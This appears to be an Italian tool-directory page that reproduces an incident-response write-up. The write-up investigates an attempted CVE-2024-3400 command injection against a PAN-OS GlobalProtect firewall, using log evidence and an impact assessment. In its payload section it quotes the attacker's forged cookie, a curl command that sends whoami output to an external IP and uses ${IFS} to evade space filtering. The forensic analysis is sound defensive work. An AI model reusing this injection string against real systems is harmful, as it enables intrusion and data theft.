Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Indagine su un tentativo di iniezione di comandi PAN-OS CVE-2024-3400, con analisi della consegna del payload, dell'elaborazione interna e della convalida dell'esecuzione sulla base delle evidenze dei log. | Kitploit
Strumenti/GitHubGitHub/zedocun/pan-os-cve-2024-3400-command-injection-investigation
Analisi delle VulnerabilitàSicurezza WebDigital ForensicsThreat IntelligenceRisposta agli IncidentiAnalisi dei Log
GitHubzedocun/pan-os-cve-2024-3400-command-injection-investigation

PAN-OS-CVE-2024-3400-Command-Injection-Investigation

Indagine su un tentativo di iniezione di comandi PAN-OS CVE-2024-3400, con analisi della consegna del payload, dell'elaborazione interna e della convalida dell'esecuzione sulla base delle evidenze dei log.

Vedi Repository
124 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Read on Medium

Indagine su un tentativo di command injection PAN-OS CVE-2024-3400

Panoramica

Questo progetto documenta l'indagine su un tentativo di command injection CVE-2024-3400 rivolto a un servizio PAN-OS GlobalProtect.

L'obiettivo era determinare:

  • se si tratti di un attacco reale
  • se l'esecuzione di comandi sia avvenuta
  • se vi siano prove di compromissione

Panoramica dell'avviso

È stato attivato un avviso critico che indica un possibile tentativo di sfruttamento.

  • Bersaglio: 172.16.17.139 (PA-Firewall-01)
  • Sorgente: 144.172.79.92
  • Endpoint: /global-protect/login.esp
  • Metodo: POST
  • Azione: Consentita

Panoramica dell'avviso


Payload dannoso

La richiesta contiene un cookie forgiato:

SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

Payload dannoso

Osservazioni chiave

  • ${IFS} aggira il filtraggio degli spazi
  • whoami tenta di recuperare l'identità del sistema
  • curl tenta una comunicazione verso l'esterno

Questo è un payload di command injection


Prove dal server web

I log di Nginx confermano che la richiesta ha raggiunto il server:

POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Log di Nginx

La richiesta dannosa è stata accettata ed elaborata.


Elaborazione interna

I log di sistema mostrano che il payload ha raggiunto la logica interna:

Log di elaborazione

Riscontro chiave

  • il payload è stato incorporato nel comando interno (dt_curl)
  • tentata richiesta verso l'esterno
  • la catena di esecuzione ha raggiunto componenti interni

Tuttavia:

La risoluzione DNS è fallita → la comunicazione verso l'esterno è fallita


Infrastruttura dell'attaccante

L'IP attaccante:

  • 144.172.79.92
  • segnalato come dannoso
  • associato a un provider di hosting

IP dell'attaccante

Ciò conferma l'origine esterna dell'attaccante.


Cronologia di rete

Più IP hanno interagito con il sistema prima dell'attacco:

Cronologia

Solo 144.172.79.92 è direttamente collegato all'exploit.


Valutazione dell'impatto

Confermato

  • tentativo di sfruttamento mirato a CVE-2024-3400
  • payload dannoso consegnato
  • richiesta elaborata dal server
  • payload arrivato all'elaborazione interna
  • tentativo verso l'esterno attivato

Non confermato

  • esecuzione di comandi del sistema operativo
  • output del comando
  • esfiltrazione di dati
  • reverse shell
  • persistenza
  • movimento laterale

Conclusione

Si è trattato di un reale tentativo di command injection.

L'attaccante è riuscito a:

  • consegnare una richiesta dannosa
  • iniettare un payload
  • attivare l'elaborazione interna

Tuttavia:

non vi è alcuna esecuzione confermata né compromissione del sistema


Classificazione finale

Tentativo di Command Injection
Payload elaborato - Nessuna esecuzione o impatto confermato

Scarica lo strumento